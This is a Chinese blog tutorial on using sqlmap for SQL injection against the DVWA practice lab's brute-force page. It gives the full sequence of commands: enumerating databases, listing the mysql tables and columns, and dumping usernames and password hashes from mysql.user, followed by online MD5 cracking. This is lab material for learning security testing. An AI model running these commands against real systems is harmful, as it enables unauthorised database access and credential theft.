DVWA——使用sqlmap工具post注入


环境工具

PS:sqlmap工具安装请查看get注入的bloghttps://blog.youkuaiyun.com/qq_45833260/article/details/125657568?spm=1001.2014.3001.5502

使用phpstudy搭建的DVWA靶场-暴力破解(low级别)
sqlmap


攻击步骤

一、获取并保存数据包

  • 选择暴力破解,输入用户名,密码随便输,burpsuite抓包(虽然此处是get请求方式,但不影响后面的攻击,也可以右键改成post方式)
    在这里插入图片描述
  • 在数据包右键选择copy to file,保存数据包为post.txt
    在这里插入图片描述
    在这里插入图片描述

二、sqlmap注入攻击

PS:将post.txt移动到和sqlmap.py同一目录下,或者写入绝对路径

1.获取数据库信息

python sqlmap.py -r post.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数
在这里插入图片描述

2.获取MySQL数据库中的表

python sqlmap.py -r post.txt -p username -D mysql --tables

在这里插入图片描述

3.获取user表中的字段

python sqlmap.py -r post.txt -p username -D mysql -T user --columns

8.0版本的user表里,没有password字段,取而代之的是authentication_string。所以需要设置密码时,应该操作此字段。

在这里插入图片描述

4.获取用户名和密码

python sqlmap.py -r post.txt -p username -D mysql -T user -C “User,authentication_string” --dump

可以看到密码解密为root
在这里插入图片描述也可以用在线的md5对密文进行解密 https://www.cmd5.com/
在这里插入图片描述


总结

本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值